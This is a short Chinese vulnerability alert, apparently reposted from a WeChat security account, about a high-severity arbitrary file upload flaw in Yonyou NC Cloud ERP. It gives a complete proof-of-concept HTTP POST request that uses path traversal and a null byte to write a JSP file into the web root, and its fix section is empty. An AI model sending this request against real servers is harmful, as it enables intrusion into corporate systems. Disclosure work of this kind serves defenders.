-
暂无
-
高危
用友NC Cloud是新一代云ERP产品,为成长型、大型、巨型集团企业提供混合云解决方案。
-
用友NC Cloud
0x05 POC
POST /portal/pt/servlet/saveXmlToFileServlet/doPost?pageId=login&filename=..%5C..%5C..%5Cwebapps%5Cnc_web%5C722695.jsp%00 HTTP/1.1
User-Agent: Apache-HttpClient/5.2.1 (Java/1.8.0_202)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: {host}
Cookie: LA_K1=langid
serverEnable: localserver
Content-Type: application/octet-stream
Content-Encoding: UTF_8
Content-Length: 9
test
0x06 修复建议
原文始发于微信公众号(浅安安全):漏洞预警 | 用友NC-Cloud任意文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论